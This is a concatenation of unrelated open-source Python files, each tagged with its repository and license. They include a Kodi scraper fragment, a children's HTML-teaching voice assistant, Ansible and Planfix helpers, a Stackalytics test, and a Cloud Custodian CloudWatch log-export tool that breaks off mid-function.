req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
try:
body = self.__http_get_with_retry(url, req)
body = body.decode('utf-8')
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ''
self.db_connection.cache_url(url, body)
after = time.time()
log_utils.log('Cached Url Fetch took: %.2f secs' % (after - before), log_utils.LOGDEBUG)
return body
def __http_get_with_retry(self, url, request):
log_utils.log('Fetching URL: %s' % request.get_full_url(), log_utils.LOGDEBUG)
retries = 0
html = None
while retries <= MAX_RETRIES:
try:
response = urllib2.urlopen(request, timeout=10)
html = response.read()
# if no exception, jump out of the loop
break
except socket.timeout:
retries += 1
log_utils.log('Retry #%s for URL %s because of timeout' % (retries, url), log_utils.LOGWARNING)
continue
except urllib2.HTTPError as e:
# if it's a temporary code, retry
if e.code in TEMP_ERRORS:
retries += 1
log_utils.log('Retry #%s for URL %s because of HTTP Error %s' % (retries, url, e.code), log_utils.LOGWARNING)
continue
# if it's not pass it back up the stack
else:
raise
else:
raise
response.close()
return html
|
AMOboxTV/AMOBox.LegoBuild
|
plugin.video.salts/salts_lib/srt_scraper.py
|
Python
|
gpl-2.0
| 9,410 | 0.004145 |
#This script is built as a prototype during Mozilla HelloWeb Hackathon Kolkata 2016
#An Interactive Artificial Intelligence with a friendly personality to teach 5 year olds about HTML and WEB
#Copyright Protected Under GPL3 License | Follow the License | Send Pull Requests
import re
import py
import requests
import pyaudio
import speech_recognition as sr
import os
import random
import socket
import webbrowser # facebook.com/ultimatepritam | github.com/ultimatepritam
import subprocess
import glob # GRAPHICAL USER INTERfACE using 'Tkinter' immitating "DORA THE ExPLORER"
import time
##CONFIGURE THIS SECTION TO INDIAN LANGUAGES
# set property to voice engine
import pyttsx
engine = pyttsx.init('sapi5') #USE espeak IN LINUX
engine.setProperty('voice', 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_EN-US_ZIRA_11.0')
engine.setProperty('rate', 130)
# speak function
def speak(text):
engine.say(text)
engine.runAndWait()
doss = os.getcwd()
i=0
n=0
flag=0
FACE = '''
+=======================================+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+---------------------------------------+
|#Author: ALienTrix |
|#Date: 01/06/2016 |
___
( )
.-.| | .--. ___ .-. .---.
/ \ | / \ ( ) \ / .-, \
| .-. | | .-. ; | ' .-. ; (__) ; |
| | | | | | | | | / (___) .'` |
| | | | | | | | | | / .'| |
| | | | | | | | | | | / | |
| ' | | | ' | | | | ; | ; |
' `-' / ' `-' / | | ' `-' |
`.__,' `.__.' (___) `.__.'_.
| |
+---------------------------------------+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+=======================================+
| |
+=======================================+
'''
print(FACE)
while (i<1):
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.adjust_for_ambient_noise(source)
speak("Listening..")
print("|-('')-|") #START TALKING ONLY AFTER THIS PRINTS ON THE SCREEN
audio = r.listen(source)
try:
s = (r.recognize_google(audio)) #I used google gTTS as its the best Online recognizer, you can use CMU-SPHINX for OFFLINE
message = (s.lower())
print (message)
# PROFESSOR JARVIS ========================================================================================================== TRAINING MODULE
if("teach me web") in message:
rand = ['Oh My Goodness! You are only 5 years old! and you wanna know HTML?']
speak(rand)
speak("Okay, So HTML Stands for Hyper Text Markup Language! But lets not worry about this big word")
speak("Now I'll do something for you, but lets first you cute little thing tell me whats your name ?")
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.adjust_for_ambient_noise(source)
#speak("Listening..")
print(">>>")
audio = r.listen(source)
s = (r.recognize_google(audio))
message = (s.lower())
name=message
print (name)
speak('Oukay'+message+', So pretty name you have!')
speak("Now Lets check this Cool thing I'm opening here...")
Chrome = ("C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
# B102 HARDWARE INTERRUPT NEEDED, CLOSE CHROME MANUALLY
#time.sleep(10)
#os.system('taskkill /im chrome.exe /f')
speak("Do you see your name there? What? No?")
print("10 sec up")
os.system('atom KeepCalm.html')
#subprocess.call(['notepad.exe','KeepCalm.html'])
# To be done: Selenium Time Controlled Web Browser Monitor
speak("Okay I am Opening something where you'll see some bla bla texts..")
speak("You see it?")
time.sleep(10)
print("10 sec up")
#HEADER
speak("Look theres written Dora the explorer there, lets change it your name. You know you have a good cool name. Lets write it down here.")
#os.system("notepad.exe keepcalm.html")
#os.system('atom KeepCalm.html')
time.sleep(10)
print("10 sec up")
speak("Now lets check the page with the Ugly naked guy again!")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("can you see your name there now?")
speak("You see it? Great!!")
speak("You know its called a Header in html, grown ups write some big texts here!")
#IMAGE IMPORT IN HTML
speak("Oho! Everything is great but you don't have to be naked for that. Lets dress up, shall we?")
speak("Now lets again check that stupid file with lots of bla bla texts in it")
os.system('atom KeepCalm.html')
speak("Do you see NAKED Guy written on somewhere? Can you see it? You found it? Yaaai!!")
speak("Now lets change it to DRESSED Guy")
speak("Now lets check the browser again")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("Yep! this looks better! You are a Smart kid!")
speak("Now what you just did is how we change pictures in HTML")
#STYLING IN HTML
speak("Well since we are actually doing many cool stuffs! so that 'Keep calm and Do Nothing' phrase is little awkward. don't you think so?")
speak("Now lets change it like you changed your name, Come on you can do it, I'm opening the same thing for you, its called an Editor, here you can write html codes")
os.system('atom KeepCalm.html')
speak("Now lets change the text to Keep calm and do Coding")
time.sleep(10)
print("10 sec up")
speak("you did it, cool")
speak("This portion of the code is called the Body you know! Body of the code!")
speak("Now lets make the fonts look little bit bigger")
speak("can you see there written font size?")
speak("Change the value next to the font size 160 to 200 now")
webbrowser.get(Chrome).open('KeepCalm.html')
speak("You done it? Good Work!")
speak("This thing just you did is called Styling. You know every cool kid likes fashion, our html too is cool. he likes styles. and it is called CSS")
#FURTHER DEVELOPMENT GOES BELOW HERE INSIDE THE LOOP
# exceptions
except sr.UnknownValueError:
print("$could not understand audio")
speak("Pardon sir, can you please repeat?")
except sr.RequestError as e:
print("Could not request results$; {0}".format(e))
|
ultimatepritam/HelloWeb
|
DoraTheExplorer.py
|
Python
|
gpl-3.0
| 7,919 | 0.011491 |
# -*- coding: utf-8 -*-
# Copyright 2017 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from __future__ import division, print_function, unicode_literals
TIPO_COBRANCA = (
('0', u'Carteira'),
('1', u'Cheque'),
('2', u'CNAB'),
)
TIPO_COBRANCA_SPED = (
('0', u'Duplicata'),
('1', u'Cheque'),
('2', u'Promissória'),
('3', u'Recibo'),
)
|
odoo-brazil/l10n-brazil-wip
|
l10n_br_financial/constantes.py
|
Python
|
agpl-3.0
| 388 | 0 |
from yaml.composer import Composer
from yaml.nodes import MappingNode
class AnsibleComposer(Composer):
def __init__(self):
self.__mapping_starts = []
super(Composer, self).__init__()
def compose_node(self, parent, index):
# the line number where the previous token has ended (plus empty lines)
node = Composer.compose_node(self, parent, index)
if isinstance(node, MappingNode):
node.__datasource__ = self.name
try:
(cur_line, cur_column) = self.__mapping_starts.pop()
except:
cur_line = None
cur_column = None
node.__line__ = cur_line
node.__column__ = cur_column
return node
def compose_mapping_node(self, anchor):
# the column here will point at the position in the file immediately
# after the first key is found, which could be a space or a newline.
# We could back this up to find the beginning of the key, but this
# should be good enough to determine the error location.
self.__mapping_starts.append((self.line + 1, self.column + 1))
return Composer.compose_mapping_node(self, anchor)
|
gitterHQ/ansible
|
v2/ansible/parsing/yaml/composer.py
|
Python
|
gpl-3.0
| 1,212 | 0.00495 |
import os
from subprocess import call, Popen, PIPE
import sys
from . import Command
from . import utils
class OpenSequenceInRV(Command):
"""%prog [options] [paths]
Open the latest version for each given entity.
"""
def run(self, sgfs, opts, args):
# Parse them all.
arg_to_movie = {}
arg_to_entity = {}
for arg in args:
if os.path.exists(arg):
arg_to_movie[arg] = arg
continue
print 'Parsing %r...' % arg
data = utils.parse_spec(sgfs, arg.split(), ['Shot'])
type_ = data.get('type')
id_ = data.get('id')
if not (type_ or id_):
print 'no entities found for', repr(arg)
return 1
arg_to_entity.setdefault(type_, {})[arg] = sgfs.session.merge(dict(type=type_, id=id_))
tasks = arg_to_entity.pop('Task', {})
shots = arg_to_entity.pop('Shot', {})
if arg_to_entity:
print 'found entities that were not Task or Shot:', ', '.join(sorted(arg_to_entity))
return 2
if tasks:
print 'Getting shots from tasks...'
sgfs.session.fetch(tasks.values(), 'entity')
for arg, task in tasks.iteritems():
shots[arg] = task['entity']
if shots:
print 'Getting versions from shots...'
sgfs.session.fetch(shots.values(), ('sg_latest_version.Version.sg_path_to_movie', 'sg_latest_version.Version.sg_path_to_frames'))
for arg, shot in shots.iteritems():
version = shot.get('sg_latest_version')
if not version:
print 'no version for', shot
return 3
path = version.get('sg_path_to_movie') or version.get('sg_path_to_frames')
if not path:
print 'no movie or frames for', version
return 4
arg_to_movie[arg] = path
movies = [arg_to_movie[arg] for arg in args]
print 'Opening:'
print '\t' + '\n\t'.join(movies)
rvlink = Popen(['rv', '-bakeURL'] + movies, stderr=PIPE).communicate()[1].strip().split()[-1]
self.open(rvlink)
def open(self, x):
if sys.platform.startswith('darwin'):
call(['open', x])
else:
call(['xdg-open', x])
run = OpenSequenceInRV()
|
westernx/sgfs
|
sgfs/commands/rv.py
|
Python
|
bsd-3-clause
| 2,458 | 0.004475 |
import requests
from hashlib import md5
from xml.etree import ElementTree
from django.core.cache import cache
from functools import cmp_to_key
# class Cache(object):
# params = {}
#
# def get(self,key):
# if key in self.params:
# return self.params[key]
# else:
# return None
#
# def set(self,key,value,timeout):
# self.params[key] = value
#
#
# cache = Cache()
class PlanFixBase(object):
CACHE_TIMELIFE = 20
request_templ = """<?xml version="1.0" encoding="UTF-8"?>
<request method="{}">
{}
<signature>{}</signature>
</request>
"""
name = ''
scheme = []
sign = ''
host = ""
api_key = ""
private_key = ""
project_id = ""
user = ""
password = ""
account = ""
level = 0
sid = None
debug = None
def __init__(self,*args,**kwargs):
self.sid = cache.get('planfix_sid')
attr_list = [i.__str__() for i in dir(self) if not i.startswith('__')]
if kwargs:
for item in kwargs.keys():
if item in attr_list:
self.__setattr__(item,kwargs[item])
if not self.sid:
self.auth()
def scheme_sort(self,a,b):
tmp_a = a.keys()[0] if isinstance(a,dict) else a
tmp_b = b.keys()[0] if isinstance(b,dict) else b
if tmp_a == tmp_b: return 0
if tmp_a > tmp_b:
return 1
else:
return -1
def get_sign(self,**kwargs):
params_list = self.name + self.string_by_schemefileds(self.scheme,**kwargs) + self.private_key
self.sign = md5(params_list.encode('utf-8')).hexdigest()
def string_by_schemefileds(self,element,**kwargs):
result_list = []
element = list(element)
sorted(element,key=cmp_to_key(self.scheme_sort))
for item in element:
if not isinstance(item, dict):
tmp_item = self.get_value(item,)
result_list.append(self.get_value(item, **kwargs))
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
result_list.append(self.get_value(tmp_key, **kwargs))
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res, list):
result_list.append("".join(["".join([str(i[0]),str(i[1])]) for i in res]))
else:
result_list.append(self.get_value(tmp_val, **kwargs))
else:
result_list.append(self.string_by_schemefileds(tmp_val, **kwargs))
return "".join(result_list)
def get_value(self,value, **kwargs):
if value in kwargs:
return kwargs.get(value)
return ''
def create_xml_by_scheme(self,element, **kwargs):
result = ""
template = "<%s>%s</%s>"
custom_data_template = "<id>%s</id><value>%s</value>"
for item in element:
if not isinstance(item, dict):
result += template % (item, self.get_value(item, **kwargs), item)
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res,list):
sub_result = "".join([template % (tmp_val,(custom_data_template % i),tmp_val) for i in res])
else:
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
else:
sub_result = self.create_xml_by_scheme(tmp_val, **kwargs)
result += template % (tmp_key, sub_result, tmp_key)
return result
def connect(self,**kwargs):
if not 'sid' in kwargs and self.sid:
kwargs['sid'] = self.sid
self.get_sign(**kwargs)
body = self.create_xml_by_scheme(self.scheme, **kwargs)
self.print_debug(body)
data = self.request_templ.format(self.name,body.encode('utf-8'),self.sign)
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
if self.name != 'auth.login':
if self.is_session_valid(r.content):
self.print_debug(r.content)
return r.content
else:
tmp_params = dict(name=self.name,scheme=self.scheme)
self.auth(renew=True)
self.scheme,self.name = tmp_params['scheme'],tmp_params['name']
return self.connect(**kwargs)
else:
return r.content
def is_session_valid(self,res):
response = ElementTree.fromstring(res)
if response.attrib['status'] == 'ok':
return True
else:
if response.find('code').text == '0005':
return False
else:
raise AttributeError(response.find('code').text)
def auth(self,renew=False):
if renew or self.sid == None:
self.name = 'auth.login'
self.scheme = \
[ 'account'
, 'login'
, 'password'
]
params = \
{ 'account':self.account
, 'login':self.user
, 'password':self.password
}
response = ElementTree.fromstring(self.connect(**params))
res = response.find('sid')
self.sid = res.text
cache.set('planfix_sid',self.sid,self.CACHE_TIMELIFE*60)
def print_debug(self,msg):
if hasattr(self.debug,'__call__'):
try:
self.debug(msg)
except TypeError as e:
print(e)
|
chadoneba/django-planfix
|
planfix/classes.py
|
Python
|
apache-2.0
| 6,136 | 0.009452 |
class LoggerSingleton:
_instance = None
@staticmethod
def get_instance(console_log=False):
if LoggerSingleton._instance is None:
LoggerSingleton._instance = LoggerSingleton._Logger()
if console_log:
LoggerSingleton._instance.set_next(LoggerSingleton._ConsoleLogger())
return LoggerSingleton._instance
class _Logger(object):
def __init__(self):
self.next_logger = None
def log(self, message):
if self.next_logger is not None:
self.next_logger.log(message)
def set_next(self, next):
if self.next_logger is not None:
self.next_logger.set_next(next)
else:
self.next_logger = next
class _ConsoleLogger(_Logger):
def __init__(self):
LoggerSingleton._Logger.__init__(self)
def log(self, message):
print message
LoggerSingleton._Logger.log(self, message)
|
oknalv/piollo
|
loggersingleton.py
|
Python
|
gpl-2.0
| 1,004 | 0.001992 |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import testtools
from stackalytics.processor import mps
class TestMps(testtools.TestCase):
def setUp(self):
super(TestMps, self).setUp()
def test_member_parse_regex(self):
content = '''<h1>Individual Member Profile</h1>
<div class="candidate span-14">
<div class="span-4">
<img src="/themes/openstack/images/generic-profile-photo.png"><p> </p>
</div>
<a name="profile-10501"></a>
<div class="details span-10 last">
<div class="last name-and-title">
<h3>Jim Battenberg</h3>
</div>
<hr><div class="span-3"><strong>Date Joined</strong></div>
<div class="span-7 last">June 25, 2013 <br><br></div>
<div class="span-3"><strong>Affiliations</strong></div>
<div class="span-7 last">
<div>
<b>Rackspace</b> From (Current)
</div>
</div>
<div class="span-3"><strong>Statement of Interest </strong></div>
<div class="span-7 last">
<p>contribute logic and evangelize openstack</p>
</div>
<p> </p>'''
match = re.search(mps.NAME_AND_DATE_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Jim Battenberg', match.group('member_name'))
self.assertEqual('June 25, 2013 ', match.group('date_joined'))
match = re.search(mps.COMPANY_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Rackspace', match.group('company_draft'))
|
ogazitt/stackalytics
|
tests/unit/test_mps.py
|
Python
|
apache-2.0
| 1,964 | 0 |
# Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from botocore.exceptions import ClientError
import boto3
import click
import json
from c7n.credentials import assumed_session
from c7n.utils import get_retry, dumps, chunks
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime, timedelta
from dateutil.tz import tzutc, tzlocal
from dateutil.parser import parse
import fnmatch
import functools
import jsonschema
import logging
import time
import os
import operator
from tabulate import tabulate
import yaml
from c7n.executor import MainThreadExecutor
MainThreadExecutor.async = False
logging.basicConfig(level=logging.INFO)
logging.getLogger('c7n.worker').setLevel(logging.DEBUG)
logging.getLogger('botocore').setLevel(logging.WARNING)
log = logging.getLogger('c7n-log-exporter')
CONFIG_SCHEMA = {
'$schema': 'http://json-schema.org/schema#',
'id': 'http://schema.cloudcustodian.io/v0/logexporter.json',
'definitions': {
'destination': {
'type': 'object',
'additionalProperties': False,
'required': ['bucket'],
'properties': {
'bucket': {'type': 'string'},
'prefix': {'type': 'string'},
},
},
'account': {
'type': 'object',
'additionalProperties': False,
'required': ['role', 'groups'],
'properties': {
'name': {'type': 'string'},
'role': {'oneOf': [
{'type': 'array', 'items': {'type': 'string'}},
{'type': 'string'}]},
'groups': {
'type': 'array', 'items': {'type': 'string'}
}
}
}
},
'type': 'object',
'additionalProperties': False,
'required': ['accounts', 'destination'],
'properties': {
'accounts': {
'type': 'array',
'items': {'$ref': '#/definitions/account'}
},
'destination': {'$ref': '#/definitions/destination'}
}
}
def debug(func):
@functools.wraps(func)
def run(*args, **kw):
try:
return func(*args, **kw)
except SystemExit:
raise
except Exception:
import traceback
import pdb
import sys
traceback.print_exc()
pdb.post_mortem(sys.exc_info()[-1])
raise
return run
@click.group()
def cli():
"""c7n cloudwatch log group exporter"""
@cli.command()
@click.option('--config', type=click.Path())
def validate(config):
"""validate config file"""
with open(config) as fh:
content = fh.read()
try:
data = yaml.safe_load(content)
except Exception:
log.error("config file: %s is not valid yaml", config)
raise
try:
jsonschema.validate(data, CONFIG_SCHEMA)
except Exception:
log.error("config file: %s is not valid", config)
raise
log.info("config file valid, accounts:%d", len(data['accounts']))
return data
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('--start', required=True)
@click.option('--end')
@click.option('-a', '--accounts', multiple=True)
@click.option('--debug', is_flag=True, default=False)
def run(config, start, end, accounts):
"""run export across accounts and log groups specified in config."""
config = validate.callback(config)
destination = config.get('destination')
start = start and parse(start) or start
end = end and parse(end) or datetime.now()
executor = debug and MainThreadExecutor or ThreadPoolExecutor
with executor(max_workers=32) as w:
futures = {}
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
futures[
w.submit(process_account, account, start, end, destination)] = account
for f in as_completed(futures):
account = futures[f]
if f.exception():
log.error("Error on account %s err: %s",
account['name'], f.exception())
log.info("Completed %s", account['name'])
def lambdafan(func):
"""simple decorator that will auto fan out async style in lambda.
outside of lambda, this will invoke synchrously.
"""
if 'AWS_LAMBDA_FUNCTION_NAME' not in os.environ:
return func
@functools.wraps(func)
def scaleout(*args, **kw):
client = boto3.client('lambda')
client.invoke(
FunctionName=os.environ['AWS_LAMBDA_FUNCTION_NAME'],
InvocationType='Event',
Payload=dumps({
'event': 'fanout',
'function': func.__name__,
'args': args,
'kwargs': kw}),
Qualifier=os.environ['AWS_LAMBDA_FUNCTION_VERSION'])
return scaleout
@lambdafan
def process_account(account, start, end, destination, incremental=True):
session = get_session(account['role'])
client = session.client('logs')
paginator = client.get_paginator('describe_log_groups')
all_groups = []
for p in paginator.paginate():
all_groups.extend([g for g in p.get('logGroups', ())])
group_count = len(all_groups)
groups = filter_creation_date(
filter_group_names(all_groups, account['groups']),
start, end)
if incremental:
groups = filter_last_write(client, groups, start)
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
log.info("account:%s matched %d groups of %d",
account.get('name', account_id), len(groups), group_count)
if not groups:
log.warning("account:%s no groups matched, all groups \n %s",
account.get('name', account_id), "\n ".join(
[g['logGroupName'] for g in all_groups]))
t = time.time()
for g in groups:
export.callback(
g,
destination['bucket'], prefix,
g['exportStart'], end, account['role'],
name=account['name'])
log.info("account:%s exported %d log groups in time:%0.2f",
account.get('name') or account_id,
len(groups), time.time() - t)
def get_session(role, session_name="c7n-log-exporter", session=None):
if role == 'self':
session = boto3.Session()
elif isinstance(role, basestring):
session = assumed_session(role, session_name)
elif isinstance(role, list):
session = None
for r in role:
session = assumed_session(r, session_name, session=session)
else:
session = boto3.Session()
return session
def filter_group_names(groups, patterns):
"""Filter log groups by shell patterns.
"""
group_names = [g['logGroupName'] for g in groups]
matched = set()
for p in patterns:
matched.update(fnmatch.filter(group_names, p))
return [g for g in groups if g['logGroupName'] in matched]
def filter_creation_date(groups, start, end):
"""Filter log groups by their creation date.
Also sets group specific value for start to the minimum
of creation date or start.
"""
results = []
for g in groups:
created = datetime.fromtimestamp(g['creationTime'] / 1000.0)
if created > end:
continue
if created > start:
g['exportStart'] = created
else:
g['exportStart'] = start
results.append(g)
return results
def filter_last_write(client, groups, start):
"""Filter log groups where the last write was before the start date.
"""
retry = get_retry(('ThrottlingException',))
def process_group(group_set):
matched = []
for g in group_set:
streams = retry(
client.describe_log_streams,
logGroupName=g['logGroupName'],
orderBy='LastEventTime',
limit=1, descending=True)
if not streams.get('logStreams'):
continue
stream = streams['logStreams'][0]
if stream['storedBytes'] == 0 and datetime.fromtimestamp(
stream['creationTime'] / 1000) > start:
matched.append(g)
elif 'lastIngestionTime' in stream and datetime.fromtimestamp(
stream['lastIngestionTime'] / 1000) > start:
matched.append(g)
return matched
results = []
with ThreadPoolExecutor(max_workers=3) as w:
futures = {}
for group_set in chunks(groups, 10):
futures[w.submit(process_group, group_set)] = group_set
for f in as_completed(futures):
if f.exception():
log.error(
"Error processing groupset:%s error:%s",
group_set,
f.exception())
results.extend(f.result())
return results
def filter_extant_exports(client, bucket, prefix, days, start, end=None):
"""Filter days where the bucket already has extant export keys.
"""
end = end or datetime.now()
# days = [start + timedelta(i) for i in range((end-start).days)]
try:
tag_set = client.get_object_tagging(Bucket=bucket, Key=prefix).get('TagSet', [])
except ClientError as e:
if e.response['Error']['Code'] != 'NoSuchKey':
raise
tag_set = []
tags = {t['Key']: t['Value'] for t in tag_set}
if 'LastExport' not in tags:
return sorted(days)
last_export = parse(tags['LastExport'])
if last_export.tzinfo is None:
last_export = last_export.replace(tzinfo=tzutc())
return [d for d in sorted(days) if d > last_export]
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-a', '--accounts', multiple=True)
def access(config, accounts=()):
"""Check iam permissions for log export access in each account"""
config = validate.callback(config)
accounts_report = []
def check_access(account):
accounts_report.append(account)
session = get_session(account['role'])
identity = session.client('sts').get_caller_identity()
account['account_id'] = identity['Account']
account.pop('groups')
account.pop('role')
client = session.client('iam')
policy_arn = identity['Arn']
if policy_arn.count('/') > 1:
policy_arn = policy_arn.rsplit('/', 1)[0]
if ':sts:' in policy_arn:
policy_arn = policy_arn.replace(':sts', ':iam')
if ':assumed-role' in policy_arn:
policy_arn = policy_arn.replace(':assumed-role', ':role')
evaluation = client.simulate_principal_policy(
PolicySourceArn=policy_arn,
ActionNames=['logs:CreateExportTask'])['EvaluationResults']
account['access'] = evaluation[0]['EvalDecision']
with ThreadPoolExecutor(max_workers=16) as w:
futures = {}
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
futures[w.submit(check_access, account)] = None
for f in as_completed(futures):
pass
accounts_report.sort(key=operator.itemgetter('access'), reverse=True)
print(tabulate(accounts_report, headers='keys'))
def GetHumanSize(size, precision=2):
# interesting discussion on 1024 vs 1000 as base
# https://en.wikipedia.org/wiki/Binary_prefix
suffixes = ['B','KB','MB','GB','TB', 'PB']
suffixIndex = 0
while size > 1024:
suffixIndex += 1
size = size / 1024.0
return "%.*f %s" % (precision, size, suffixes[suffixIndex])
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-a', '--accounts', multiple=True)
@click.option('--day', required=True, help="calculate sizes for this day")
@click.option('--group', required=True)
@click.option('--human/--no-human', default=True)
def size(config, accounts=(), day=None, group=None, human=True):
"""size of exported records for a given day."""
config = validate.callback(config)
destination = config.get('destination')
client = boto3.Session().client('s3')
day = parse(day)
def export_size(client, account):
paginator = client.get_paginator('list_objects_v2')
count = 0
size = 0
session = get_session(account['role'])
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
prefix = "%s/%s/%s" % (prefix, group, day.strftime("%Y/%m/%d"))
account['account_id'] = account_id
for page in paginator.paginate(
Bucket=destination['bucket'],
Prefix=prefix):
for k in page.get('Contents', ()):
size += k['Size']
count += 1
return (count, size)
total_size = 0
accounts_report = []
logging.getLogger('botocore').setLevel(logging.ERROR)
with ThreadPoolExecutor(max_workers=16) as w:
futures = {}
for account in config.get('accounts'):
if accounts and account['name'] not in accounts:
continue
futures[w.submit(export_size, client, account)] = account
for f in as_completed(futures):
account = futures[f]
count, size = f.result()
account.pop('role')
account.pop('groups')
total_size += size
if human:
account['size'] = GetHumanSize(size)
else:
account['size'] = size
account['count'] = count
accounts_report.append(account)
accounts_report.sort(key=operator.itemgetter('count'), reverse=True)
print(tabulate(accounts_report, headers='keys'))
log.info("total size:%s", GetHumanSize(total_size))
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-g', '--group', required=True)
@click.option('-a', '--accounts', multiple=True)
@click.option('--dryrun/--no-dryrun', is_flag=True, default=False)
def sync(config, group, accounts=(), dryrun=False):
"""sync last recorded export to actual
Use --dryrun to check status.
"""
config = validate.callback(config)
destination = config.get('destination')
client = boto3.Session().client('s3')
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
session = get_session(account['role'])
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
prefix = "%s/%s" % (prefix, group)
exports = get_exports(client, destination['bucket'], prefix + "/")
role = account.pop('role')
if isinstance(role, basestring):
account['account_id'] = role.split(':')[4]
else:
account['account_id'] = role[-1].split(':')[4]
account.pop('groups')
if exports:
last_export = exports.pop()
account['export'] = last_export
else:
account['export'] = 'missing'
last_export = None
try:
tag_set = client.get_object_tagging(
Bucket=destination['bucket'], Key=prefix).get('TagSet', [])
except:
tag_set = []
tags = {t['Key']: t['Value'] for t in tag_set}
tagged_last_export = None
if 'LastExport' in tags:
le = parse(tags['LastExport'])
tagged_last_export = (le.year, le.month, le.day)
account['sync'] = tagged_last_export
else:
account['sync'] = account['export'] != 'missing' and 'sync' or 'missing'
if last_export is None:
continue
if tagged_last_export == last_export or account['export'] == 'missing':
continue
if dryrun:
continue
client.put_object(
Bucket=destination['bucket'],
Key=prefix,
Body=json.dumps({}),
ACL="bucket-owner-full-control",
ServerSideEncryption="AES256")
export_time = datetime.now().replace(tzinfo=tzlocal()).astimezone(tzutc())
export_time = export_time.replace(
year=last_export[0], month=last_export[1], day=last_export[2],
minute=0, second=0, microsecond=0, hour=0)
client.put_object_tagging(
Bucket=destination['bucket'], Key=prefix,
Tagging={
'TagSet': [{
'Key': 'LastExport',
'Value': export_time.isoformat()}]})
accounts_report = []
for a in config.get('accounts'):
if accounts and a['name'] not in accounts:
continue
if isinstance(a['sync'], tuple):
a['sync'] = "%s/%s/%s" % (a['sync'])
if isinstance(a['export'], tuple):
a['export'] = "%s/%s/%s" % (a['export'])
accounts_report.append(a)
accounts_report.sort(key=operator.itemgetter('export'), reverse=True)
print(tabulate(accounts_report, headers='keys'))
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('-g', '--group', required=True)
@click.option('-a', '--accounts', multiple=True)
def status(config, group, accounts=()):
"""report current export state status"""
config = validate.callback(config)
destination = config.get('destination')
client = boto3.Session().client('s3')
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
session = get_session(account['role'])
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
prefix = "%s/flow-log" % prefix
role = account.pop('role')
if isinstance(role, basestring):
account['account_id'] = role.split(':')[4]
else:
account['account_id'] = role[-1].split(':')[4]
account.pop('groups')
try:
tag_set = client.get_object_tagging(
Bucket=destination['bucket'], Key=prefix).get('TagSet', [])
except:
account['export'] = 'missing'
continue
tags = {t['Key']: t['Value'] for t in tag_set}
if 'LastExport' not in tags:
account['export'] = 'empty'
else:
last_export = parse(tags['LastExport'])
account['export'] = last_export.strftime('%Y/%m/%d')
accounts = [a for a in config.get('accounts') if a in accounts or not accounts]
accounts.sort(key=operator.itemgetter('export'), reverse=True)
print(tabulate(accounts, headers='keys'))
def get_exports(client, bucket, prefix, latest=True):
"""Find exports for a given account
"""
keys = client.list_objects_v2(
Bucket=bucket, Prefix=prefix, Delimiter='/').get('CommonPrefixes', [])
found = []
years = []
for y in keys:
part = y['Prefix'].rsplit('/', 2)[-2]
if not part.isdigit():
continue
year = int(part)
years.append(year)
if not years:
return []
years.sort(reverse=True)
if latest:
years = [years[0]]
for y in years:
keys = client.list_objects_v2(
Bucket=bucket, Prefix="%s/%d/" % (prefix.strip('/'), y),
Delimiter='/').get('CommonPrefixes', [])
months = []
